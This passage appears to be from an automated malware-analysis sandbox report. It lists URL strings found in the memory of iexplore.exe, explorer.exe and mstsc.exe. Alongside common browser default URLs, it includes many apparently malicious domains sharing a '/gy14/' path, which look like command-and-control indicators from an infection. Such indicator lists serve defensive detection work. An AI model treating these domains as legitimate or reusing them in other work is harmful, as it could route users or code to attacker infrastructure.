          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accepted6.com/gy14/www.0854n5.shop
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accepted6.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aicashu.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aicashu.com/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aicashu.com/gy14/www.qieqyt.xyz
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aicashu.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.icoe
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D39C000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4187597827.000001BA61100000.00000004.00000800.00020000.00000000.sdmp, msapplication.xml.13.drString found in binary or memory: http://www.amazon.com/
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico7
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&camp=1789&creativ
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.de/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.amiciperlacoda.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.amiciperlacoda.com/gy14/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.amiciperlacoda.com/gy14/www.artbydianayorktownva.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amiciperlacoda.com/gy14/www.beautyloungebydede.online
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.amiciperlacoda.com/gy14/www.vendorato.online
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.amiciperlacoda.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ampsportss.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ampsportss.com/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ampsportss.com/gy14/www.amiciperlacoda.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ampsportss.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arrakis.com/_
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arrakis.com/favicon.icoZ
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.com/gy14/
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.com/gy14/www.accepted6.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.com/gy14/www.vendorato.online
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ask.com/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000005.00000003.3106960387.000000000C974000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109005574.000000000C9AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3108691424.000000000C9A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1769871733.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.beautyloungebydede.online
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.beautyloungebydede.online/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.beautyloungebydede.onlineReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.biosif.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.biosif.com/gy14/
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.biosif.com/gy14/www.artbydianayorktownva.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.biosif.com/gy14/www.mtdiyx.xyz
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.biosif.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buflitr.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buflitr.com/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buflitr.com/gy14/www.venitro.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buflitr.comReferer:
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.camelpmkrf.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.camelpmkrf.com/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.camelpmkrf.com/gy14/www.mtdiyx.xyz
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.camelpmkrf.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cdiscount.com/#
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175701016.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.icojx
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico##
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cnet.co.uk/%
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.collline.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.collline.com/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.collline.com/gy14/www.tulisanemas.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.collline.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.creditspisatylegko.site
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.creditspisatylegko.site/gy14/
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.creditspisatylegko.site/gy14/www.169cc.xyz
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creditspisatylegko.site/gy14/www.myxtremecleanshq.services
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.creditspisatylegko.siteReferer:
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: mstsc.exe, 00000006.00000003.2002328904.0000000006B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elbt-ag.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elbt-ag.com/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elbt-ag.com/gy14/www.survivordental.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elbt-ag.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
